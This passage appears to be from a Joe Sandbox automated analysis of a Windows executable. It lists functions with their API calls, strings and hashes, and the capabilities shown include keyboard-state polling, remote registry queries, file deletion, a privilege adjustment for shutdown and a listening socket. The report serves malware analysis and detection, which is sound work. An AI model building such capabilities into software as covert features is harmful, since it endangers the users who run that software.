                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Close$ConnectCreateRegistryValue
                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                            • API String ID: 536824911-966354055
                            • Opcode ID: 26a76c045516059306466d808c75db802c68201650924e432c769f9ded38ade3
                            • Instruction ID: b0bb29b8f1af00282156bd8fbaf58136e8ebf6549a65278a46c8c7eaa5283c25
                            • Opcode Fuzzy Hash: 26a76c045516059306466d808c75db802c68201650924e432c769f9ded38ade3
                            • Instruction Fuzzy Hash: 02024A756006029FCB14EF19C891E2ABBE5FF89710F04855DF88A9B362CB31EC45CBA1
                            Function 00DAF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00DAF113
                            • _wcscmp.LIBCMT ref: 00DAF128
                            • _wcscmp.LIBCMT ref: 00DAF13F
                              • Part of subcall function 00DA4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DA43A0
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00DAF16E
                            • FindClose.KERNEL32(00000000), ref: 00DAF179
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00DAF195
                            • _wcscmp.LIBCMT ref: 00DAF1BC
                            • _wcscmp.LIBCMT ref: 00DAF1D3
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DAF1E5
                            • SetCurrentDirectoryW.KERNEL32(00DF8920), ref: 00DAF203
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DAF20D
                            • FindClose.KERNEL32(00000000), ref: 00DAF21A
                            • FindClose.KERNEL32(00000000), ref: 00DAF22C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                            • String ID: *.*
                            • API String ID: 1824444939-438819550
                            • Opcode ID: 98f320b2865f3ca57fbfd5526ea8af2fba29b87d65127dfe6738bb6199baf138
                            • Instruction ID: ee5f4bccf3418d830c66d6286898492e34bc15dd51e1efe713d84791692debdd
                            • Opcode Fuzzy Hash: 98f320b2865f3ca57fbfd5526ea8af2fba29b87d65127dfe6738bb6199baf138
                            • Instruction Fuzzy Hash: 7231B33650021A7ADF10ABA4EC49FEEB7ADDF46360F1441B5E800E31A1DB70DE49CA79
                            Function 00DAA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                            Download Yara Rule
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DAA20F
                            • __swprintf.LIBCMT ref: 00DAA231
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DAA26E
                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00DAA293
                            • _memset.LIBCMT ref: 00DAA2B2
                            • _wcsncpy.LIBCMT ref: 00DAA2EE
                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00DAA323
                            • CloseHandle.KERNEL32(00000000), ref: 00DAA32E
                            • RemoveDirectoryW.KERNEL32(?), ref: 00DAA337
                            • CloseHandle.KERNEL32(00000000), ref: 00DAA341
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                            • String ID: :$\$\??\%s
                            • API String ID: 2733774712-3457252023
                            • Opcode ID: d6ad04d4d02efc281951a71d3742f07113fc55b631aced3e9adf2138b59894af
                            • Instruction ID: d6d60b28c4c349b1000e940ecc31be1944b12ffeb394c424b35f37a5d5ab755d
                            • Opcode Fuzzy Hash: d6ad04d4d02efc281951a71d3742f07113fc55b631aced3e9adf2138b59894af
                            • Instruction Fuzzy Hash: 7F31BEB190020AABDB219FA4DC49FEB77BDEF89740F1441B6FA08D2160EB749644CB35
                            Function 00D566E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                            • API String ID: 0-4052911093
                            • Opcode ID: 79b8a3e60c28d985a84a07dfdcaef5a86bc1e5327c38e3521b225f27713e7269
                            • Instruction ID: 344f8afc3c40277af9e3fa7822716f5084cfd1b7ce4bb604ec18a1a204ce1ba8
                            • Opcode Fuzzy Hash: 79b8a3e60c28d985a84a07dfdcaef5a86bc1e5327c38e3521b225f27713e7269
                            • Instruction Fuzzy Hash: A9726E75E0021A9BDF14DF58C8807AEB7B5FF48311F54816AED49EB290EB70D985CBA0
                            Function 00DA001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00DA0097
                            • SetKeyboardState.USER32(?), ref: 00DA0102
                            • GetAsyncKeyState.USER32 ref: 00DA0122
                            • GetKeyState.USER32(000000A0), ref: 00DA0139
                            • GetAsyncKeyState.USER32 ref: 00DA0168
                            • GetKeyState.USER32(000000A1), ref: 00DA0179
                            • GetAsyncKeyState.USER32 ref: 00DA01A5
                            • GetKeyState.USER32(00000011), ref: 00DA01B3
                            • GetAsyncKeyState.USER32 ref: 00DA01DC
                            • GetKeyState.USER32(00000012), ref: 00DA01EA
                            • GetAsyncKeyState.USER32 ref: 00DA0213
                            • GetKeyState.USER32(0000005B), ref: 00DA0221
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            • Opcode ID: e7b0791633a7e4e20c4ab95219da09a41e8539a3982b5ce91e688d8f1ea7960e
                            • Instruction ID: 4ff9430ee2b95991f888095198a9219b78e9b0b9dd48c92afb2113123d192766
                            • Opcode Fuzzy Hash: e7b0791633a7e4e20c4ab95219da09a41e8539a3982b5ce91e688d8f1ea7960e
                            • Instruction Fuzzy Hash: D451D62090478829FB35DBA088557EABFB49F03380F0C459ED9C25B5C2DAA49B8CC776
                            Function 00DC03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DC0E1A: CharUpperBuffW.USER32(?,?), ref: 00DC0E31
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DC04AC
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00DC054B
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00DC05E3
                            • RegCloseKey.ADVAPI32(000000FE), ref: 00DC0822
                            • RegCloseKey.ADVAPI32(00000000), ref: 00DC082F
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                            • String ID:
                            • API String ID: 1240663315-0
                            • Opcode ID: 89138de237bbbcd5b5c9d335d7ed3a4d8ec9d2c2464fbe253ddabb4a614226a8
                            • Instruction ID: 01c2f6a2caf29b5d7f2c991321068f6403d2e00fee0b1377fd226fc5ef599ec3
                            • Opcode Fuzzy Hash: 89138de237bbbcd5b5c9d335d7ed3a4d8ec9d2c2464fbe253ddabb4a614226a8
                            • Instruction Fuzzy Hash: D9E15D71204211EFCB14DF28C891E6BBBE5EF89714F04896DF84ADB261DB31E905CBA1
                            Function 00DB4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                            • String ID:
                            • API String ID: 1737998785-0
                            • Opcode ID: 77624620c4ef1affb8dc60064bcb7934c659fa148e13fe279723f0f369ccc86e
                            • Instruction ID: 63fa77aff7c5a2cafab4828f446ca8506091ee071dde6089bd1794edec1aeac3
                            • Opcode Fuzzy Hash: 77624620c4ef1affb8dc60064bcb7934c659fa148e13fe279723f0f369ccc86e
                            • Instruction Fuzzy Hash: EB217E356003129FDB10AF29DC19FAABBA9EF05751F148026F946DB3A2DB30AC418B74
                            Function 00DA37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D44750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D44743,?,?,00D437AE,?), ref: 00D44770
                              • Part of subcall function 00DA4A31: GetFileAttributesW.KERNEL32(?,00DA370B), ref: 00DA4A32
                            • FindFirstFileW.KERNEL32(?,?), ref: 00DA38A3
                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00DA394B
                            • MoveFileW.KERNEL32 ref: 00DA395E
                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00DA397B
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DA399D
                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00DA39B9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                            • String ID: \*.*
                            • API String ID: 4002782344-1173974218
                            • Opcode ID: 3e4c3b379688f77e995ec920cb241b7f3e9a96f5be93c7af246ab0ffa1690d25
                            • Instruction ID: 40ddafcc338265cb27e354e311389cb017526383f510fb922494d6d89b11d63d
                            • Opcode Fuzzy Hash: 3e4c3b379688f77e995ec920cb241b7f3e9a96f5be93c7af246ab0ffa1690d25
                            • Instruction Fuzzy Hash: 3F51583180514DABCF05EBA0DA929EEB77AEF16300F644169F406B6192EB716F09CF71
                            Function 00DAF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00DAF440
                            • Sleep.KERNEL32(0000000A), ref: 00DAF470
                            • _wcscmp.LIBCMT ref: 00DAF484
                            • _wcscmp.LIBCMT ref: 00DAF49F
                            • FindNextFileW.KERNEL32(?,?), ref: 00DAF53D
                            • FindClose.KERNEL32(00000000), ref: 00DAF553
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                            • String ID: *.*
                            • API String ID: 713712311-438819550
                            • Opcode ID: 6eb6d40b2b3788d3bfb9e613c7fc5b55b73edecc483298ddb64c105df45c3e5b
                            • Instruction ID: 94d12f047414fecba0cf96b7c8a6e86865f2d8d6d04a1d996750e932dc562d02
                            • Opcode Fuzzy Hash: 6eb6d40b2b3788d3bfb9e613c7fc5b55b73edecc483298ddb64c105df45c3e5b
                            • Instruction Fuzzy Hash: 46412871D0021AAFCF14EFA4D855AEEBBB5EF0A310F1445A6E815A3291EB309A44CF70
                            Function 00D55760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: fd164bfe3515b8a399a35059d9173672b9c6e2fb26d26b4971fc924a186c32b7
                            • Instruction ID: 8ac31b172b4e68d58fa3d95c0642ebc39f31b23ede460aef310bb952c2d5312b
                            • Opcode Fuzzy Hash: fd164bfe3515b8a399a35059d9173672b9c6e2fb26d26b4971fc924a186c32b7
                            • Instruction Fuzzy Hash: A4129A70A00609DFDF04DFA5E991AAEBBF5FF48310F108529E846E7255EB36A914CB70
                            Function 00DA3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D44750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D44743,?,?,00D437AE,?), ref: 00D44770
                              • Part of subcall function 00DA4A31: GetFileAttributesW.KERNEL32(?,00DA370B), ref: 00DA4A32
                            • FindFirstFileW.KERNEL32(?,?), ref: 00DA3B89
                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DA3BD9
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DA3BEA
                            • FindClose.KERNEL32(00000000), ref: 00DA3C01
                            • FindClose.KERNEL32(00000000), ref: 00DA3C0A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                            • String ID: \*.*
                            • API String ID: 2649000838-1173974218
                            • Opcode ID: 7aa9c7ac1d9ffc7d78b9a7e42cd43e68b02e73152a785b5fd6f7a3213fddf052
                            • Instruction ID: a421b2b00658bd0dad685c98d7dc3e1b147b3d232c3d52b9d59717ae2378ee16
                            • Opcode Fuzzy Hash: 7aa9c7ac1d9ffc7d78b9a7e42cd43e68b02e73152a785b5fd6f7a3213fddf052
                            • Instruction Fuzzy Hash: F6316D31008385ABC201EF24D891DAFB7A9FE92314F444E2DF4D592192EB21DA09CB77
                            Function 00DA51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D9882B
                              • Part of subcall function 00D987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D98858
                              • Part of subcall function 00D987E1: GetLastError.KERNEL32 ref: 00D98865
                            • ExitWindowsEx.USER32(?,00000000), ref: 00DA51F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                            • String ID: $@$SeShutdownPrivilege
                            • API String ID: 2234035333-194228
                            • Opcode ID: 41f5832f91aca705fe3567d80e2125ef536135fe0fd189a91dabb0da8c6da931
                            • Instruction ID: ec246c7f5e2d6d0c400c45055c34fd7a34fa4e5ccef8c2254fe0f2614e0b7f62
                            • Opcode Fuzzy Hash: 41f5832f91aca705fe3567d80e2125ef536135fe0fd189a91dabb0da8c6da931
                            • Instruction Fuzzy Hash: C6017631B917022BFB282368BC8AFBB7298EB07750F680930F953E60D6DA505C0085B8
                            Function 00DB6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                            Download Yara Rule
                            APIs
                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00DB62DC
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB62EB
                            • bind.WSOCK32(00000000,?,00000010), ref: 00DB6307
                            • listen.WSOCK32(00000000,00000005), ref: 00DB6316
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB6330
                            • closesocket.WSOCK32(00000000,00000000), ref: 00DB6344
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorLast$bindclosesocketlistensocket
                            • String ID:
                            • API String ID: 1279440585-0
                            • Opcode ID: 699cd6c0aa64eafb0882ac5f590b32ea788eb2f5382f63dda5a8afcd34b30736
                            • Instruction ID: 42498da9cc380fe3d1595ba16e4dbcb79f20428fa4650fd8356828b81e0a7387
                            • Opcode Fuzzy Hash: 699cd6c0aa64eafb0882ac5f590b32ea788eb2f5382f63dda5a8afcd34b30736
                            • Instruction Fuzzy Hash: 44218D71600205AFCB10AF68C885EAEB7E9EF48720F184159F856E7391C774ED01CB71
                            Function 00D4FCE0 Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 1040COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: pb
                            • API String ID: 3964851224-3672949377
                            • Opcode ID: 1c9c405ddd730cdf2359e00dca5e34987f1443dfe4f9030f9604ef7703b907dd
                            • Instruction ID: 98912cafb2315fb9e16dc8f426b4eb48b5f58f37417ca0d54b4603f208a52847
                            • Opcode Fuzzy Hash: 1c9c405ddd730cdf2359e00dca5e34987f1443dfe4f9030f9604ef7703b907dd
                            • Instruction Fuzzy Hash: 5F923B706043419FDB24DF14C490B2ABBE5FF85304F18896DE89A9B362D775EC49CBA2
                            Function 00D55520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D60DB6: std::exception::exception.LIBCMT ref: 00D60DEC
                              • Part of subcall function 00D60DB6: __CxxThrowException@8.LIBCMT ref: 00D60E01
                            • _memmove.LIBCMT ref: 00D90258
                            • _memmove.LIBCMT ref: 00D9036D
                            • _memmove.LIBCMT ref: 00D90414
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                            • String ID:
                            • API String ID: 1300846289-0
                            • Opcode ID: 504cc61e760413e60da3451999ee8b78addf309026468b0f1f00b30010b78794
                            • Instruction ID: 5ab83eeb071cd62215ae75402724f0b81b64a45724c71690f1bc735311efad11
                            • Opcode Fuzzy Hash: 504cc61e760413e60da3451999ee8b78addf309026468b0f1f00b30010b78794
                            • Instruction Fuzzy Hash: 66029FB0A00209DFCF05DF68E991AAEBBB5EF44310F148069E84ADB355EB35D954CBB1
                            Function 00D41287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00D419FA
                            • GetSysColor.USER32(0000000F,?,?), ref: 00D41A4E
                            • SetBkColor.GDI32(?,00000000), ref: 00D41A61
                              • Part of subcall function 00D41290: DefDlgProcW.USER32(?,00000020,?), ref: 00D412D8
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ColorProc$LongWindow
                            • String ID:
                            • API String ID: 3744519093-0
